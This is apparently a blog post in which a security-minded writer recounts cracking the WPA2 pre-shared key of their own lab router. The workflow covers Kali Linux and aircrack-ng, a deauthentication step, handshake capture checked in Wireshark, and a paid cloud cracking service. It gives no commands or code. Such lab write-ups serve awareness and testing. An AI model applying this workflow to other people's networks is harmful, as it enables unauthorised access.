Cyber-security is becoming a serious concern for small-business owners who maintain electronic medical records and/or customer payment information.
An area where a small business owners can become vulnerable is with regard to their 802.11 WiFi.
And so I decided to investigate.
The first thing I did was to research tools for wireless cracking. I started out by reading a couple books. The first book I read was entitled Cryptography: A Short Introduction by Fred Piper & Sean Murphy (in order to get a good refresher on the principles of cryptography). I also read Wireless Hacking Exposed by Johnny Cache. These two books gave me enough of the “basics” to point me in the right direction for Internet-resources on required software and hardware.
Next, I decided what kind of wireless network I wanted to crack. There are several authentication / encryption methods deployed in wireless networks today such as WEP, WPA/WPA2 Pre-Shared Key, WPA2 Dynamic-Shared Key, and WPA2 Enterprise (802.1x). Everybody says WEP is easy to crack so I thought I would start with that. However, I discovered that while the actual encryption key is in fact easier to crack than WPA/WPA2, the preparation is a little more involved – the amount of captured traffic to perform the brute-force attack (20K-90K packets) on the WEP key is dramatically more than that of WPA/WPA2. So in the interest of time and also because WPA2 it is more common, I decided to crack WPA/WPA2 Pre-Shared Key.
Next, I had to acquire the necessary hardware and software. Because of the number of variables, this task alone consumes hours upon hours of time (in total I probably had to invest 40 hours of time). There are many other blog posts written about this and so I won’t re-iterate what has already been written. With regard to software, I decided to use Kali Linux and aircrack-ng.
Next, I set up a lab environment. I wanted to setup a lab that would be as close to real world as possible (I even “Googled” most popular WiFi passwords of 2013). And so I decided to use the Verizon Actiontec router that is supplied with almost every FIOS installation out there. I setup the router for 802.11G, WPA2 Pre-Shared Key…
Next, I associated my test laptop with this new wireless SSID…
I also decided to start a continuous ping to the Verizon wireless router on my test laptop. I then started up my cracking hardware / software and began the attack. I noticed on my test laptop packet-loss during the aircrack-ng deauth phase of the attack…
Afterwards I took a look at the resulting PCAP file in Wireshark to verify the WPA2 4-Way authentication handshake between my test laptop and wireless router.
Capturing the traffic is one thing. Once you have successfully captured the authentication between the wireless client and router, you now have to have a way to try every possible password until you find a match. Modern CPU’s generally process about 100K passwords per second. With the gazillion possibilities this makes normal CPU’s a poor choice for discovering a password.
That is why modern systems replace CPUs with Graphical Processing Units (GPU) that are scaled together for distributed compute power when brute-force cracking passwords. This allows us to compress years of compute time into minutes or hours or days. Thankfully, we can rent compute power today such as Amazon’s Web Services (AWS) or we can use a cloud-based service. I decided to use a cloud-based service and logged into www.cloudcracker.com and uploaded my PCAP file for their analysis. They charge me a $17 fee but it is way worth it.
So once I paid the fee they sent me an e-mail confirmation…
… and then another e-mail confirmation when they get started…
… and then another e-mail after they’ve cracked the password for you…
So basically the brute-force part of this attack took about 108 seconds to crack the most popular wireless password used in 2013.
